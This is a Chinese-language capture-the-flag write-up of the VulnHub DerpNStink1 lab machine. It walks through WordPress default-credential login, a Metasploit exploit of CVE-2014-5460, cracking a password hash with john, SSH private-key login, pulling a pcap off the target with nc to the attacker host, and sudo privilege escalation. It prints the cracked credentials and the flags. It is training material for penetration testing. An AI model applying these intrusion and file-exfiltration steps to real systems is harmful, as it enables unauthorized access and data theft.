特色:这个靶机的知识点非常多。初做时不太顺利,几个地方卡住,如:在ssh -i 私钥时文件要600权限(所有者具有读取和写入权限,而组和其他用户没有任何权限),以及ssh证书失效的处理(-o PubkeyAcceptedKeyTypes=+ssh-rsa);二是在msf中exploit犯了一低级错误,居然用nc监听导致占用报错,折腾半天;三是从靶机传文件出来(以前都是传文件到靶机,这次是相反操作);四是涉及wp插件Exp、john爆破、mysql、ssh私钥、流量包、提权等多项知识点。
靶机下载地址:https://www.vulnhub.com/entry/derpnstink-1,221/
靶机:192.168.137.133
1、扫描开放端口:21、22、80
2、扫描目录
dirb http://192.168.137.133 -w ,加个-w主要是出现警告信息不停止
有很多目录;
3、flag1:
查看主页源码,发现flag1:<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
4、登录后台
扫描目录时,发现weblog;访问下,发现需要域名,在hosts中加入域名和ip,再访问,可以了。
找到后台/weblog/wp-admin,用admin/admin发现可以登录,
5、网站为wordpress模板,扫描
wpscan --url http://derpnstink.local/weblog,发现插件,
6、搜索slideshow gallery漏洞
太麻烦啊,不但是python2的,还要安装各种包,还是用msf吧。
7、msf直接exploit
用msfconsole,search cve-2014-5460,设置好参数
刚开始老是提示端口被占用,后来才发觉用错了,不需要用nc来监听端口,msf直接run就会打开端口,难怪是这个提示,折腾半天。
8、找到wp的配置文件,发现mysql用户名和密码
9、连接数据库http://derpnstink.local/php/phpmyadmin/,
10、flag2:
在wp-posts中找到了flag2.txt :flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
11、john爆破密码
在wp_users里面有第二个用户unclestinky,爆破这个密码$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41,将它放入到hash.hash文件中
密码为wedgie57
12、ftp登录stinky
用stinky和密码wedgie57来登录ftp
13、ssh的私钥key
在多层的ssh目录下有个key.txt
应该是个ssh的私钥;
14、ssh私钥方式登录stinky
报如上的错,
遂将key.txt权限修改成600,chmod 600 key.txt
还报错了,查询原因,发现是ssh证书失效了的原因,在后面加一段命令-o PubkeyAcceptedKeyTypes=+ssh-rsa,
15、flag3:
16、在documents目录发现了一个叫derpissues.pcap的流量包,查看字符串,发现是另一个用户mrderp的流量
17、下载文件到本地分析,
在攻击中监听待传输的文件,nc -lvvp 1234 > derpissues.pcap
靶机上 nc -nv 192.168.137.128 1234 < derpissues.pcap
将流量包从靶机下载到攻击机中,查看
找到密码derpderpderpderpderpderpderp
18、ssh登录mrderp用户
在Desktop目录找到helpdesk.log文件查看
按照提示去访问这个地址https://pastebin.com/RzK9WfGw
sudo -l,结果也一样
19、提权
-
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
这是一个linux sudo命令知识点,大概意思:允许mrderp用户在主机上以root用户权限读写执行/home/mrderp/binaries/目录下derpy开头的文件
提示可以在靶机下运行derpy二进制
运行,提权成功
20、flag4:
原文始发于微信公众号(MicroPest):msf Exploit+ssh priKey:DerpnStink1靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论